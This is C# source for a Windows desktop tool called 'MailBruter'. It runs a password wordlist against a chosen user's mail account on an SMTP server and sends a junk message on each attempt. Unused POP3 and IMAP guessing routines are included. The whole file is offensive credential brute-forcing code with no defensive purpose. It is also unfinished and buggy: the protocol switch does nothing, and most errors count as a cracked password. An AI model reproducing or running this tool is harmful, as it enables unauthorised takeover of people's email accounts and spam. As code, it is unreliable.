﻿using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using OpenPop.Pop3;
using ActiveUp.Net.Mail;

namespace MailBruter
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void btnStart_Click(object sender, EventArgs e)
        {
            if (!bgw.IsBusy)
            {
                bgw.RunWorkerAsync();
            }
            else
            {
                tbStats.Text = "Already running!";
            }
        }

        private void TrackTimeout_Scroll(object sender, EventArgs e)
        {
            lblTimeOut.Text = TrackTimeout.Value.ToString();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            Form1.CheckForIllegalCrossThreadCalls = false;
            lblTimeOut.Text = "1";
        }

        private void bgw_ProgressChanged(object sender, ProgressChangedEventArgs e)
        {
            BruteProgress.Value = e.ProgressPercentage;
        }

        private void btnLoadPassFile_Click(object sender, EventArgs e)
        {
            ofd.ShowDialog();
            tbPas.Text = ofd.FileName;
        }
        public static IEnumerable<string> ReadLines(string path)
        {
            using (System.IO.StreamReader reader = System.IO.File.OpenText(path))
            {
                string line;
                while ((line = reader.ReadLine()) != null)
                {
                    yield return line;
                }
            }
        }

        private void bgw_DoWork(object sender, DoWorkEventArgs e)
        {
            string filename = tbPas.Text;
            string mailmeth = cbMailType.Text;
            switch (mailmeth)
            {
                case "imap":
                    {
                        break;
                    }
                case "imaps":
                    {
                        break;
                    }
                case "pop3":
                    {
                        break;
                    }
                case "pop3s":
                    {
                        break;
                    }
                case "SMTP":
                    {
                        break;
                    }
                case "SMTPS":
                    {
                        break;
                    }
                
            }
            int counter = 0;
            List<string> wordlist = new List<string>();
            foreach (string wordline in (ReadLines(filename)))
            {
                wordlist.Add(wordline);
            }
            int lc = wordlist.Count; // use this for the progress bar step
            BruteProgress.Maximum = lc;

           
            
            
            foreach (string pass in wordlist.ToArray())
            {
                if (!SmtpMailBrute(pass)) // maybe name 3 separate functions?
                {
                    counter++;
                    bgw.ReportProgress(counter);
                    continue;
                }
                else
                {
                    MessageBox.Show("we win, cracked pass is " + pass);

                    break;
                }

            }

            tbStats.Text += "Brute complete!";
            BruteProgress.Value = 0;
        }

        private bool SmtpMailBrute(string pass)
        {
            int timeout = TrackTimeout.Value * 1000; // timeout is in milliseconds, so mul by 1k
            string user = cbUser.Text;
            string host = tbHostName.Text;
            int port = Convert.ToInt32(tbPort.Text);
            System.Net.Mail.SmtpClient sc = new System.Net.Mail.SmtpClient();
            sc.Host = host;
            sc.Port = port;
            sc.Timeout = timeout;
            sc.UseDefaultCredentials = false;
            System.Net.NetworkCredential basic_creds = new System.Net.NetworkCredential(user, pass);
            sc.Credentials = basic_creds;
            try
            {
                sc.Send(user, "lol@wut.net", "sorry to spam you", "if this is a real person, im sorry!");
            }
            catch (System.Net.Mail.SmtpException ex)
            {
                if (ex.StatusCode == System.Net.Mail.SmtpStatusCode.ClientNotPermitted)
                {
                    return false;
                }
                return true;
                
            }

            return true;
        }
        private bool Pop3Brute(string pass, int ssl)
        {
            int timeout = TrackTimeout.Value * 1000; // timeout is in milliseconds, so mul by 1k
            string user = cbUser.Text;
            string host = tbHostName.Text;
            int port = Convert.ToInt32(tbPort.Text);
            OpenPop.Pop3.Pop3Client pop3c = new Pop3Client();

            if (ssl == 1)
            {
                try
                {

                    pop3c.Connect(host, port, true);
                    pop3c.Authenticate(user, pass);
                    return true;
                }
                catch (OpenPop.Pop3.Exceptions.InvalidLoginException)
                {
                    return false;
                }
            }
            else
            {
                try
                {

                    pop3c.Connect(host, port, false);
                    pop3c.Authenticate(user, pass);
                    return true;
                }
                catch (OpenPop.Pop3.Exceptions.InvalidLoginException)
                {
                    return false;
                }
            }
        }
        private bool ImapBrute(string pass, int ssl)
        {
            int timeout = TrackTimeout.Value * 1000; // timeout is in milliseconds, so mul by 1k
            string user = cbUser.Text;
            string host = tbHostName.Text;
            int port = Convert.ToInt32(tbPort.Text);
            Imap4Client imc = new Imap4Client();
            imc.Connect(host, port, user, pass);
            Mailbox inbox = imc.SelectMailbox("inbox");
            string body = inbox.Fetch.BodySection(1, 3);
            imc.Disconnect();
            return true;
        }
        private void btnStop_Click(object sender, EventArgs e)
        {
            if (bgw.IsBusy)
            {
                bgw.CancelAsync();
            }
            else
            {
                tbStats.Text = "Not running!";
            }
            // drew suggested chunking. take the size of the password list, break it up into chunks like say 1000 per thread
        }
      
    }
    static class Extensions
    {
        public static IEnumerable<IEnumerable<T>> Chunk<T>(this IEnumerable<T> list, int chunkSize)
        {
            int i = 0;
            var chunks = from name in list
                         group name by i++ / chunkSize into part
                         select part.AsEnumerable();
            return chunks;
        }
    }
}
